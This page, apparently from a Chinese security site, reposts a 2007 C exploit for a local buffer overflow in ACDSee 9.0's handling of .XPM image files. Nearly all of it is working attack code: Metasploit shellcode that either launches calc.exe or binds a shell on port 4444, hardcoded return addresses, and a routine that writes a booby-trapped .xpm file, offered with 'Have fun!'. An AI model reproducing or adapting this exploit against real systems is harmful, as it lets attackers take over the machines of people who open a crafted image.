首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ACDSee 9.0 (.XPM File) Local Buffer Overflow Exploit
来源:Marsupilamipowa@hotmail.fr 作者:Marsu 发布时间:2007-04-23  
/*****************************************************************************
*                  ACDSee v9.0 .XPM File Buffer Overflow                     *
*                                                                            *
*                                                                            *
* ACDSee is vulnerable to an unspecified buffer overflow when processing a   *
* crafted .XPM file.                                                         *
* This exploit runs calc.exe or binds shell to port 4444, and works against  *
* ACDSee and ACDSee Quick View.                                              *
*                                                                            *
* Tested against Win XP SP2 FR.                                              *
* Have Fun!                                                                  *
*                                                                            *
* Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>                 *
*****************************************************************************/

#include "stdio.h"
#include "stdlib.h"

/* win32_exec -  EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char CalcShellcode[] =
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x98"
"\x11\xbe\xa7\x83\xeb\xfc\xe2\xf4\x64\xf9\xfa\xa7\x98\x11\x35\xe2"
"\xa4\x9a\xc2\xa2\xe0\x10\x51\x2c\xd7\x09\x35\xf8\xb8\x10\x55\xee"
"\x13\x25\x35\xa6\x76\x20\x7e\x3e\x34\x95\x7e\xd3\x9f\xd0\x74\xaa"
"\x99\xd3\x55\x53\xa3\x45\x9a\xa3\xed\xf4\x35\xf8\xbc\x10\x55\xc1"
"\x13\x1d\xf5\x2c\xc7\x0d\xbf\x4c\x13\x0d\x35\xa6\x73\x98\xe2\x83"
"\x9c\xd2\x8f\x67\xfc\x9a\xfe\x97\x1d\xd1\xc6\xab\x13\x51\xb2\x2c"
"\xe8\x0d\x13\x2c\xf0\x19\x55\xae\x13\x91\x0e\xa7\x98\x11\x35\xcf"
"\xa4\x4e\x8f\x51\xf8\x47\x37\x5f\x1b\xd1\xc5\xf7\xf0\x6f\x66\x45"
"\xeb\x79\x26\x59\x12\x1f\xe9\x58\x7f\x72\xdf\xcb\xfb\x3f\xdb\xdf"
"\xfd\x11\xbe\xa7";


/* win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char BindShellcode[] =
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x5c"
"\x7b\x78\x7f\x83\xeb\xfc\xe2\xf4\xa0\x11\x93\x32\xb4\x82\x87\x80"
"\xa3\x1b\xf3\x13\x78\x5f\xf3\x3a\x60\xf0\x04\x7a\x24\x7a\x97\xf4"
"\x13\x63\xf3\x20\x7c\x7a\x93\x36\xd7\x4f\xf3\x7e\xb2\x4a\xb8\xe6"
"\xf0\xff\xb8\x0b\x5b\xba\xb2\x72\x5d\xb9\x93\x8b\x67\x2f\x5c\x57"
"\x29\x9e\xf3\x20\x78\x7a\x93\x19\xd7\x77\x33\xf4\x03\x67\x79\x94"
"\x5f\x57\xf3\xf6\x30\x5f\x64\x1e\x9f\x4a\xa3\x1b\xd7\x38\x48\xf4"
"\x1c\x77\xf3\x0f\x40\xd6\xf3\x3f\x54\x25\x10\xf1\x12\x75\x94\x2f"
"\xa3\xad\x1e\x2c\x3a\x13\x4b\x4d\x34\x0c\x0b\x4d\x03\x2f\x87\xaf"
"\x34\xb0\x95\x83\x67\x2b\x87\xa9\x03\xf2\x9d\x19\xdd\x96\x70\x7d"
"\x09\x11\x7a\x80\x8c\x13\xa1\x76\xa9\xd6\x2f\x80\x8a\x28\x2b\x2c"
"\x0f\x28\x3b\x2c\x1f\x28\x87\xaf\x3a\x13\x69\x23\x3a\x28\xf1\x9e"
"\xc9\x13\xdc\x65\x2c\xbc\x2f\x80\x8a\x11\x68\x2e\x09\x84\xa8\x17"
"\xf8\xd6\x56\x96\x0b\x84\xae\x2c\x09\x84\xa8\x17\xb9\x32\xfe\x36"
"\x0b\x84\xae\x2f\x08\x2f\x2d\x80\x8c\xe8\x10\x98\x25\xbd\x01\x28"
"\xa3\xad\x2d\x80\x8c\x1d\x12\x1b\x3a\x13\x1b\x12\xd5\x9e\x12\x2f"
"\x05\x52\xb4\xf6\xbb\x11\x3c\xf6\xbe\x4a\xb8\x8c\xf6\x85\x3a\x52"
"\xa2\x39\x54\xec\xd1\x01\x40\xd4\xf7\xd0\x10\x0d\xa2\xc8\x6e\x80"
"\x29\x3f\x87\xa9\x07\x2c\x2a\x2e\x0d\x2a\x12\x7e\x0d\x2a\x2d\x2e"
"\xa3\xab\x10\xd2\x85\x7e\xb6\x2c\xa3\xad\x12\x80\xa3\x4c\x87\xaf"
"\xd7\x2c\x84\xfc\x98\x1f\x87\xa9\x0e\x84\xa8\x17\xac\xf1\x7c\x20"
"\x0f\x84\xae\x80\x8c\x7b\x78\x7f";


char XPMHeaders[]=
"\x2f\x2a\x20\x58\x50\x4d\x20\x2a\x2f\x0d\x0a\x73\x74\x61\x74\x69"
"\x63\x20\x63\x68\x61\x72\x20\x2a\x50\x69\x78\x6d\x61\x70\x5b\x5d"
"\x20\x3d\x20\x7b\x0d\x0a\x22\x35\x30\x39\x20\x34\x33\x38\x20\x32"
"\x35\x36\x20\x33\x22\x2c\x0d\x0a\x22";

int main(int argc, char* argv[])
{
FILE* xpmfile;
char evilbuff[6600];
int offset=0;

printf("[+] ACDSee v9.0 .XPM File Buffer Overflow\n");
printf("[+] Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>\n");
if (argc!=3) {
printf("[+] Usage: %s Mode <file.xpm>\n",argv[0]);
printf("[+] Mode is 0 -> run calc.exe\n");
printf("[+]         1 -> bind shell to port 4444\n");
return 0;
}

memset(evilbuff,'A',6600);
memcpy(evilbuff,XPMHeaders,sizeof(XPMHeaders)-1);

memcpy(evilbuff+0x1040,"\x05\x03\x81\x7C",4); //call ebx in kernel32. This one is for ACDsee9.exe
memcpy(evilbuff+0x10a4,"\x90\x90\xeb\x16\x2a\x02\xfc\x7f\x2a\x02\xfc\x7f",12); //pop pop ret in ???. Works for ACDsee9.exe and ACDSeeQV.exe

if (!atoi(argv[1]))
memcpy(evilbuff+0x11a0,CalcShellcode,strlen(CalcShellcode));
else
memcpy(evilbuff+0x11a0,BindShellcode,strlen(BindShellcode));

//End of XPM file
memcpy(evilbuff+0x1916,"\x22\x0d\x0a\x29\x3b\x0d\x0a",7);

if ((xpmfile=fopen(argv[2],"wb"))==0) {
printf("[-] Unable to access file.\n");
return 0;
}

fwrite( evilbuff, 1, 6600, xpmfile );
fclose(xpmfile);
printf("[+] Done. Have fun!\n");
return 0;

}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Photofiltre Studio v8.1.1 (.TI
·XnView 1.90.3 (.XPM File) Loca
·Foxit Reader 2.0 (PDF) Remote
·WEBInsta FM 0.1.4 login.php ab
·eXtremail <= 2.1.1 DNS Parsing
·Corel Paint Shop Pro Photo 11.
·MyBulletinBoard (MyBB) <= 1.2.
·Winamp <= 5.3 (WMV File) Remot
·Winamp <= 5.33 (.AVI File) Rem
·Opera 9.2 (torrent File) Remot
·AimStats 3.2 (process.php upda
·GNU Mailutils imap4d 0.6 Remot
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved